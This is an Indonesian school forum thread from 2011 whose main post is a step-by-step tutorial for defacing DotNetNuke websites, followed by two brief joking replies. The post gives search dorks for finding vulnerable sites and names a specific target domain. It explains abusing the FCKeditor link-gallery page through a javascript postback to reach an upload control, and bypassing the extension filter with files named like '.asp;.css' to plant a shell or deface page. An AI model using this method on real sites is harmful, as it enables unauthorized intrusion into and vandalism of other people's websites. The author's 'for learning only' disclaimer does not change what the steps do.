Al-ijtihad Tangerang Forum
Selamat Datang Di Forum Al-ijtihad Kota Tangerang

Forum Tempat Berbagi ilmu Akutansi, Administrasi Perkantoran, dan Multimedia serta Hal - Hal Menarik Lainya

Silahkan pilih Login, jika ingin masuk dan sudah mendaftar
Silahkan pilih Pendaftaran, jika anda belum bergabung

terima kasih
salam, Altang Forum Team @2011

Al-ijtihad Tangerang Forum

KOMUNITAS SISWA, ALUMNI, DAN GURU AL-IJTIHAD KOTA TANGERANG
 
IndeksCalendarFAQPencarianPendaftaranLogin

Share | 
 

 [Tutorial] How to defacing DNN (dot net nuke) aspx

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Auditor Team
Auditor Team

avatar
kandar_multimedia
Jumlah posting : 48
Points : 300
Join date : 20.01.11
Age : 22
Lokasi : Tangerang

PostSubyek: [Tutorial] How to defacing DNN (dot net nuke) aspx   Thu Jan 20, 2011 9:08 pm

oke, agan udh liat judulnya ??
"defacing aspx" apaan tuh ?? defacing aspx mksd gw itu, nge deface halaman lain dari suatu web vuln yang menggunakan basis data aspx selain halaman utama

oke, daripada lama2 langsung aja

ini dorknya : inurl:tabid"aspx"
bisa juga : inurl:fck/fcklinlgallery.aspx

oke kali ini gw udh nemu nih

1. kalo gw kan udh nemu, kalian juga harus nemuin, boleh juga pake halaman ini

2. untuk kali ini saya rekomendasikan untuk menggunakan [ http://fril.co.il/ ]

3. tambahkan kalimat ini : "providers/htmleditorproviders/fck/fcklinkgallery.aspx" di blakang url tsbt

4. sehingga akan menjadi seperti ini :
"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

5. oke sekarang ada halaman yang kurang lebih akan seperti ini
Spoiler:
 

6. lalu klik lah "(File (A file on your site" nih pic nya
Spoiler:
 

7. setelah nge klik itu, tnggu loading selesai baru kita harus
ganti alamat protocol website nya . . ga ngerti ??
nah kan tadi alamat nya "http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx" nah kita ganti bro jadi
"javascript:__doPostBack('ctlURL$cmdUpload','')" => [ tanpa tanda kutip 2 ]

8. setelah selesai masukin kode di atas ntar keluar sendiri tuh, tombol browse kaya gni pic nya :
Spoiler:
 

9. nah kita upload deh, shell / signature yang mau kita masukin
kalo ga punya signature, pake signature buatan ane aja
bisa di download di sini :[ http://www.ziddu.com/download/13217079/n...t.txt.html ]
klo udh download ente boleh rubah se kreatif ente

oiya PENTING NIH !! file yg bisa di upload antara lain :

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

so, klo mw pake signature buatan gw kan ekstensi nya masih [.txt]

kita ubah langsung, sebelum upload ubah ekstensi nya menjadi ".asp;.css"

misal : "namasignatureLO.asp;.css" ingat ! kita harus menambahkan titik

nya dua kali " namasignatureLO[.]asp;[.]css " maksd gw titik 2 itu yang gw kurungin sehingga . .

yang tadi nya signature gw bernama "neutronxscript.txt" harus ente rubah . .

nama neutron nya terserah diubah ke apa tetapi pastikan berakhiran ".asp;.css"
kata "css" nya bisa diganti berdasarkan daftar di atas, misal *.xml , *.jpg - nah yang tanda * itu = ".asp;" [ tanpa tanda kutip 2 ]

sehingga kurang lebih akan menjadi seperti ini ekstensi nya

"namasignatureLO.asp;.css" / "namasignatureLO.asp;.xml"


10. upload, trus ktia buka hasil deface nya . .

kita liat dlu tadi nama file yang kita upload apa

misal : "signatureLO.asp;.css" kita buka alamat protocol nya

caranya : kan tadi alamat nya

"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
[ dengan catatan setelah kita berhasil / selesai upload signature kita ]

11. nah, cakep tuh gan kita rubah alamat
"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

menjadi alamat halaman defaced kita menjadi" http://fril.co.il/portals/0/signatureLO.asp;.css" so , intinya kita

harus menambahkan "portals/0/namasignatureLO.asp;.css" pada akhir "http:/fril.co.il/"

12. selamat, anda berhasil defacing halaman !!

sebelumnya ane minta maaf klo banyak kekurangan dalam posting ini
ane cuma ingin menyebarkan info kepada rekan2 sesama yang masih "newbie"

untuk video nya, saya ingin buat tapi studiocam saya lagi corrupt mulu nih pas ngerekam, mau ga mau kasih tutor lisan aja

NB : di coba dulu om, klo gagal di coba terus kalo ga ngerti ngertiin om diperlukan kemauan yang kuat dan pikiran yang kreatif untuk menjadi seorang hacker

jangan buat jahat ya, buat pembelajaran aja Smile Smile Smile Exclamation Exclamation
Kembali Ke Atas Go down
Moderator
Moderator

avatar
fajar_multimedia
Jumlah posting : 59
Points : 140
Join date : 19.01.11

PostSubyek: Re: [Tutorial] How to defacing DNN (dot net nuke) aspx   Fri Jan 21, 2011 9:40 pm

hegehehe g papa kali iseng donq
Kembali Ke Atas Go down
Jenderal Team
Jenderal Team

avatar
NeutronX
Jumlah posting : 23
Points : 1873
Join date : 19.01.11
Age : 22

PostSubyek: Re: [Tutorial] How to defacing DNN (dot net nuke) aspx   Wed Feb 02, 2011 8:42 pm

oh, wkowokwok
Kembali Ke Atas Go down
http://al-ijtihad.forumid.net



Sponsored content

PostSubyek: Re: [Tutorial] How to defacing DNN (dot net nuke) aspx   

Kembali Ke Atas Go down
 

[Tutorial] How to defacing DNN (dot net nuke) aspx

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 

 Similar topics

-
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Al-ijtihad Tangerang Forum :: SMK Al-ijtihad :: Kelas Multimedia :: Komputer / Internet / Networking-
Navigasi: